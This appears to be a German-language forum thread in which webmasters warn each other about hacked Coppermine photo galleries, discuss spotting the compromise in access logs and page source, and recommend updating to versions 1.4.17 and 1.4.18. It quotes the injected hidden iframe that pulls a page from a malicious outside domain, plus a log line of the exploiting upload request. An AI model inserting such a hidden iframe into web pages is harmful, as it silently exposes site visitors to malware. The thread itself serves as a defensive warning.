|
Coppermine-Gallery gehackt? Schaut lieber mal nach...
Hiho,
heute morgen hatte ich eine etwas unerfreuliche mail von Kerstin in meinem Postfach, Antivir fand mit der Heuristik (mein NOD blieb still :evil:) ein Problem in meiner Coppermine-Galerie => html/infected.webpage.gen. Wie sich herausgestellt hat, wurde in drei PHP-Seiten (und das beunruhigt mich dann doch :shock:) ein Iframe an den Anfang gesetzt. Code:
<iframe style="display: none" src="http://caatadgouk.com/dl/adv436.php" width="1" height="1"></iframe>Siehe dazu auch den Thread im Coppermine-Forum. http://forum.coppermine-gallery.net/...c,51671.0.html Also, Leute die Coppermine haben sollten mal schauen... Edit: ne neue Version von Coppermine soll das Problem beseitigen. Hilft aber nicht, wenn es schon passiert ist :roll: Trotzdem, man sollte unbedingt updaten, vor allem wenn man bisher verschont wurde! http://forum.coppermine-gallery.net/...c,51787.0.html Viele Grüße Andreas |
Hallo Andreas,
vielen Dank für die Info - dann werde ich mal updaten. Wie merke ich, dass die Galerie bereits befallen ist? Beim Besuch bekomme ich von meinem Antivirusprogramm keine Fehlermeldungen. Ich lade mal sämtliche PHP-Files vom Server runter und vergleiche sie mit den Original-Installationsdateien. Dann müsste ich merken, ob was geändert wurde. Lg. Josef |
Hallo Josef,
im Quellcode der generierten Seite schauen, ob da irgendwo ein ominöses Iframe auftaucht. Bei mir (und den anderen wohl auch) ist folgendes passiert: Heute Nacht ein Angriff, bei dem über eine Lücke im Upload-Teil der CPG eine Datei ins Plugin-Verzeichnis geladen wurde. (es gab auch Fälle in denen php-Dateien als zip/jpg ins Album Verzeichnis gepackt wurden) Code:
91.78.72.131 - - [13/Apr/2008:16:19:45 +0200] "POST /pluginmgr.php?op=upload HTTP/1.1" 302 24245 "http://galerie.makrograf.com/pluginmgr.php" "Opera/9.50 (Windows NT 6.0; U; en)"Logs durchstöbern und nach der upload-Funktion suchen hat bei mir den Zugriff gezeigt. |
Da bei mir auch Coppermine läuft, welche Version hast du?
|
Ich hatte die 1.4.16, also die bis dato neuste.
Eben auf die 1.4.17 upgedatet... läuft wieder, bis jetzt noch nicht neu gehackt, mal abwarten ;) |
ätz, werd ich wohl auch machen müssen.... da werd ich mir beim bridgen ja wieder die finger brechen
|
Na ja Black,
besser jetzt, als wenn es zu spät ist :? Bei mir hatte der Schadenscode zum Glück nur drei PHP-Dateien verändert, was man so liest, sind mitunter ganze Webserver betroffen und in allen PHP/HTML-Dateien steht dieser Ifram-Mist. Viel Spaß :D |
Danke für die Info, ich hab nun einfach mal ne alte, brachliegende Coppermine Galerie die ich noch auf ner subdomain hatte entsorgt. Was es nicht gibt braucht nicht gepflegt und geupdated zu werden, kann dafür aber auch nicht gehackt werden. ;) :top:
|
Heute wurde noch einmal eine Bugfix-Version 1.4.18 nachgelegt. Ich muss gestehen, dass ich mit dem Aktualisieren etwas nachlässig war und noch bis heute 1.4.14 verwendet habe. Werde jetzt aber regelmäßig updaten ...
Lg. Josef |
1.4.18 habe ich heute über die 1.4.16 drübergebügelt. Läuft ohne Probleme :top:
See ya, Maic. |
Huch, ich bin ja voellig hinterher was die Coppermine Version angeht. Vllt. hat mich das bewahrt. Werde das Update jetzt mal fix nachholen, danke für die Infos!
(Es hat nicht schon jemand auch das stramm modpack getestet?) |
Coppermine 1.4.18 (sql injection fixed)
Nachdem vor einer Woche Bärlichkeit mit dem Hinweis auf die cpg 1.4.17 kam (alte 1.4.16 hackbar über die upload routine)
Nun von mir der Hinweis auf die 1.4.18, wo eine weitere Möglichkeit einer sql injection gefixed wurde. Hinwiese zum einem Update und Downloadmöglichkeit Hier Da ja einige hier eine CPG betreiben vielleicht mal anschauen. (Update ist übrigens problemlos, selbst die gebridgde Coppermine 1.4.18 in Joomla auf meiner HP läuft sauber) Black |
danke für den Hinweis:top::top:
Gruß Andreas |
Siehe den Thread -> CPG hacked ab Posting #9.
Dort ging es schon um CPG 1.4.18. So könnte man doch eigentlich der Übersichtlichkeit wegen, diesen Thread einfach drüben unten ankleben ;) See ya, Maic. |
Upps, sorry, stimmt.. ich hatte nur den Ursprungsthreat im Kopf gehabt.... und war halt eine Woche beruflich ohne Netz
Black |
| Alle Zeitangaben in WEZ +2. Es ist jetzt 19:30 Uhr. |